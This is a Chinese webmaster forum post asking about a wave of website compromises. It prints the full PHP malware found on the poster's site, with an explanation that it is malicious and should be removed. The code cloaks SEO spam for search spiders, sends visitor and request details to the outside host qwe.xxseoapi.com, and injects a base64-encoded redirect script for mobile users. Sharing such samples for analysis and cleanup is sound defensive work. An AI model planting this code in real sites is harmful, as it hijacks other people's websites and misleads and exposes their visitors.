·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
返回列表 发布新帖

最近一拨挂马的根源是啥?

667 2
发表于 2023-6-13 19:10:14 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
我和这个截图的程序不一样,但是应该都是一样的挂马文件,

奇了怪了,最近一堆被挂马的网站,

按照这些权重词去搜就会发现,一堆都是5月底被挂马的

我的不到一周就权4了,现在已经修复了,正在往下掉


最近一拨挂马的根源是啥? 最近,一拨,挂马,根源,是啥




解码后的文件是:

  1. <script src=https://jumpjs.oss-cn-guangzhou.aliyuncs.com/js/hz59.js></script>
复制代码
还有生成随机链接的文件:
  1. http://qwe.xxseoapi.com/x.php和http://qwe.xxseoapi.com/?
复制代码
最近一拨挂马的根源是啥? 最近,一拨,挂马,根源,是啥


具体的挂马代码如下:
  1. <?phpset_time_limit(0);error_reporting(0);$a="stristr";$b=$_SERVER;function httpGetlai($c){$d=curl_init();curl_setopt($d,CURLOPT_URL,$c);curl_setopt($d,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($d,CURLOPT_RETURNTRANSFER,1);curl_setopt($d,CURLOPT_HEADER,0);$e=curl_exec($d);curl_close($d);return $e;}define('url',$b['REQUEST_URI']);define('ref',!isset($b['HTTP_REFERER'])?'':$b['HTTP_REFERER']);define('ent',$b['HTTP_USER_AGENT']);define('site',"http://qwe.xxseoapi.com/?");define('road',"domain=".$b['HTTP_HOST']."&path=".url."&spider=".urlencode(ent));define('memes',road."&referer=".urlencode(ref));define('regs','@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i');define('mobile','/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');define('area',$a(url,".xml")or $a(url,".fdc")or $a(url,".one")or $a(url,".bug")or $a(url,".doc")or $a(url,".love")or $a(url,".txt")or $a(url,".ppt")or $a(url,".pptx")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".znb")or $a(url,".msl")or $a(url,".mdb")or $a(url,".hxc"));if(preg_match(regs,ent)){if(area){echo httpGetlai(site.road);exit;}else{echo httpGetlai("http://qwe.xxseoapi.com/x.php");ob_flush();flush();}}if(area&&preg_match(mobile,ent)){echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly9qdW1wanMub3NzLWNuLWd1YW5nemhvdS5hbGl5dW5jcy5jb20vanMvaHo1OS5qcz48L3NjcmlwdD4=');exit;}?>
复制代码
这段代码是一个恶意代码,它的主要功能是将访问者的信息发送到一个远程服务器,并且如果访问者是搜索引擎爬虫,则会将其重定向到一个特定的网站。此外,它还会检查访问者是否使用移动设备,并在这种情况下将其重定向到另一个网站。建议立即删除此代码。
我要说一句 收起回复
创宇盾启航版免费网站防御网站加速服务

评论2

拾光Lv.8 发表于 2023-6-13 19:10:33 | 查看全部
研究它的技术啊。。这是真牛逼啊。这是刷快排刷上去的吗
我要说一句 收起回复
婷姐Lv.8 发表于 2023-6-13 19:11:12 | 查看全部
肯定不是啊,这么多站点,刷也需要成本的,
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:18.226.180.253,GMT+8, 2024-12-27 04:38 , Processed in 0.227017 second(s), 92 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表